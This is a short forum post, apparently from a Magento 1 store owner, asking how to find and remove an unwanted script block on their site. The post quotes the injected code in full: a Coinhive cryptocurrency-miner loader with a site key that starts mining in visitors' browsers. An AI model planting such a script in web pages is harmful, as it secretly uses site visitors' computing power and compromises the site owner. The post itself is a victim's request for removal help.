Hello,
I have a script block that I have no idea how to get rid of. Using Magento version 1. I'm seeing this block:
<script src="https://coinhive.com/lib/coinhive.min.js"></script><script> var miner = new CoinHive.Anonymous('qCqoWaozqS3nMu1uFKN081CJwOPCgRDw', {throttle: 0.5});miner.start ();</script>
Does anyone know where I can find this to get rid of it? Thanks!